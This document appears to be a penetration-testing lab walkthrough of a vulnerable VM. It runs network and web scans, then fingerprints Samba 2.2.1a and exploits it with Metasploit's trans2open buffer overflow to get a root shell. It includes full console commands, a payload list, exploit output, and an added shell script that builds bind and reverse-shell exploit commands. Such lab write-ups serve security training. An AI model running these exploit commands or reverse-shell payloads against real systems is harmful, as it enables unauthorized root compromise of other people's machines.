0x00 Information gathering
arp-scan -l # -l (--localnet): generate the address list from the interface configuration, i.e. every address (network and broadcast included) derived from the interface address and netmask
nmap -p- -sV 192.168.2.143 # -p- scan all 65535 TCP ports; -sV probe the open ports to determine service/version
Nothing stands out. Note that -sV often reports the SMB service only as "Samba smbd" or a broad version range, which is why the exact version is pinned down with a dedicated SMB probe in the next section.
nikto -h 192.168.2.143 # -h host, followed by an IP or URL
It flagged three CVEs, none easy to exploit: two XSS and one information disclosure. Nikto's matches are banner- and path-based, so confirm them by hand before spending time on them.
0x01 Samba
The target runs a Samba service, which looks like the easiest way in. Before looking for a known exploit we need the exact Samba version; Metasploit has a module that fingerprints it:
auxiliary/scanner/smb/smb_version # SMB version scanner module
Msfconsole provides a single, centralized console. Through it you can reach every Metasploit plugin, payload, exploit module, post module, and so on. Commands it does not recognize are handed to the system shell, so third-party tools such as nmap (also available as the built-in db_nmap) and sqlmap can be run without leaving the console. After starting the console, type help to list the supported commands, including the core command set and the backend database commands.
Launch msfconsole.
If you know the full module path you can use it directly:
use auxiliary/scanner/smb/smb_version
If not, search for it:
search smb_version # search for the SMB version fingerprinting module
use 0 # select result 0
show options # show the module's parameters; show info gives more detail
set rhosts 192.168.2.143 # set the target
exploit # run the module (for auxiliary modules run is the canonical command; exploit is an alias)
The Samba version comes back as 2.2.1a.
searchsploit turns up remote code execution exploits for this version: the trans2open buffer overflow (CVE-2003-0201), which affects Samba 2.2.x before 2.2.8a.
searchsploit is a command-line search tool for Exploit-DB (run searchsploit -u first so the local copy of the database is current).
searchsploit samba 2.2.1a
search trans2open # look up the first hit from searchsploit; the other results are worth trying too, there is more than one way in
use 1 # check the module's target OS: a module built for a different OS will fail; here we use the second result, the Linux one
show options # list the parameters
msf6 exploit(linux/samba/trans2open) > set rhosts 192.168.2.143 # set the target (only rhosts is required here)
rhosts => 192.168.2.143
msf6 exploit(linux/samba/trans2open) > show payloads # list compatible payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/debug_trap normal No Generic x86 Debug Trap
2 payload/generic/shell_bind_aws_ssm normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact normal No Interact with Established SSH Connection
6 payload/generic/tight_loop normal No Generic x86 Tight Loop
7 payload/linux/x86/adduser normal No Linux Add User
8 payload/linux/x86/chmod normal No Linux Chmod
9 payload/linux/x86/exec normal No Linux Execute Command
10 payload/linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
11 payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
12 payload/linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager
13 payload/linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86)
14 payload/linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
15 payload/linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6)
16 payload/linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager
17 payload/linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager
18 payload/linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager
19 payload/linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP
20 payload/linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline
21 payload/linux/x86/read_file normal No Linux Read File
22 payload/linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
23 payload/linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
24 payload/linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager
25 payload/linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86)
26 payload/linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
27 payload/linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6)
28 payload/linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager
29 payload/linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
30 payload/linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager
31 payload/linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6)
32 payload/linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
33 payload/linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
34 payload/linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
35 payload/linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6)
msf6 exploit(linux/samba/trans2open) > set payload 25 # here we use the x86 bind shell; in practice you pick either a bind or a reverse payload (e.g. 34)
payload => linux/x86/shell/bind_tcp
msf6 exploit(linux/samba/trans2open) > exploit # launch the attack
[*] 192.168.2.143:139 - Trying return address 0xbffffdfc...
[*] Started bind TCP handler against 192.168.2.143:4444
[*] 192.168.2.143:139 - Trying return address 0xbffffcfc...
[*] 192.168.2.143:139 - Trying return address 0xbffffbfc...
[*] 192.168.2.143:139 - Trying return address 0xbffffafc...
[*] Sending stage (36 bytes) to 192.168.2.143
[*] 192.168.2.143:139 - Trying return address 0xbffff9fc...
[*] 192.168.2.143:139 - Trying return address 0xbffff8fc...
[*] 192.168.2.143:139 - Trying return address 0xbffff7fc...
[*] 192.168.2.143:139 - Trying return address 0xbffff6fc...
[*] 192.168.2.143:139 - Trying return address 0xbffff5fc...
[*] Command shell session 5 opened (192.168.2.128:33813 -> 192.168.2.143:4444) at 2023-12-14 12:17:21 +0800
id
uid=0(root) gid=0(root) groups=99(nobody) # root shell obtained
The "Trying return address 0x..." lines show the module brute-forcing the return address downwards in 0x100 steps until one lands on the shellcode; this only works because the stack sits at the same address on every attempt and, as the module description states, the target's stack is executable. smbd runs as root, so the shell is root immediately.
Supplement
A stager payload is responsible for setting up the network connection between the target and the attacker and then downloading the remaining component (the stage). One common stager is reverse_tcp: the target opens a TCP connection back to a port the attacker is listening on (reverse connection). The other common one is bind_tcp: the target opens a TCP listener and the attacker connects to it whenever convenient (forward, or bind, connection). In the payload list above, a slash between the payload type and the transport (shell/bind_tcp) marks a staged payload, while an underscore (shell_bind_tcp) marks an inline, stageless one; the "Sending stage (36 bytes)" line in the exploit output is the stage being delivered to the stager.
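Getting the payload direction wrong is the usual reason a working exploit produces no session: a bind payload needs the attacker to reach target:LPORT after the overflow, a reverse payload needs LHOST set to an address the target can call back to. The script below is an added example, not code from the original post or from Metasploit: it reads the connection model off the payload name using the naming convention described above and builds the matching non-interactive trans2open invocation with exactly the options that direction requires. The module path, option names and `exploit -z` (do not auto-interact with the session, so the console stays usable) are real Metasploit syntax; the host addresses are the ones from the walkthrough.

```shell
#!/bin/sh
# Added example: decode a Metasploit payload path and build the exploit command.
# Convention: '/' between payload type and transport (shell/bind_tcp) = staged,
# '_' (shell_bind_tcp) = inline/stageless. bind_* listens on the target,
# reverse_* connects back to the attacker.

# Prints "<staged|inline> <bind|reverse>"; returns 1 for any other transport.
payload_kind() {
    p="${1#payload/}"          # accept both "payload/linux/..." and "linux/..."
    last="${p##*/}"            # final path component, e.g. bind_tcp or shell_bind_tcp
    case "$last" in
        bind_*|reverse_*)     staging=staged ;;
        *_bind_*|*_reverse_*) staging=inline ;;
        *) echo "$p: no bind/reverse transport in the name" >&2; return 1 ;;
    esac
    case "$last" in
        *bind*)    echo "$staging bind" ;;
        *reverse*) echo "$staging reverse" ;;
    esac
}

# Builds the msfconsole command line for trans2open with the options the
# payload direction needs. Bind: RHOSTS plus LPORT, the port the target opens
# and the attacker then connects to. Reverse: additionally LHOST, the attacker
# address the target calls back to.
# Usage: exploit_cmd <payload> <rhost> [lhost] [lport]
exploit_cmd() {
    payload="${1#payload/}"
    rhost="$2"
    lhost="${3:-}"
    lport="${4:-4444}"
    kind=$(payload_kind "$payload") || return 1
    case "$kind" in
        *bind)
            conn="set LPORT $lport" ;;
        *reverse)
            [ -n "$lhost" ] || { echo "reverse payload needs LHOST (attacker address)" >&2; return 1; }
            conn="set LHOST $lhost; set LPORT $lport" ;;
    esac
    # exploit -z: do not drop into the session automatically; use sessions -i <id> later.
    printf 'msfconsole -q -x "use exploit/linux/samba/trans2open; set RHOSTS %s; set PAYLOAD %s; %s; exploit -z"\n' \
        "$rhost" "$payload" "$conn"
}

# Demo with the walkthrough's addresses (attacker 192.168.2.128, target 192.168.2.143).
payload_kind linux/x86/shell/bind_tcp
exploit_cmd linux/x86/shell/bind_tcp 192.168.2.143
payload_kind linux/x86/shell_reverse_tcp
exploit_cmd linux/x86/shell_reverse_tcp 192.168.2.143 192.168.2.128
```

Before firing a reverse payload, make sure LHOST really is an address on the attacker's interface facing the target; before firing a bind payload, make sure nothing between you and the target filters LPORT, otherwise the overflow succeeds but no session ever appears.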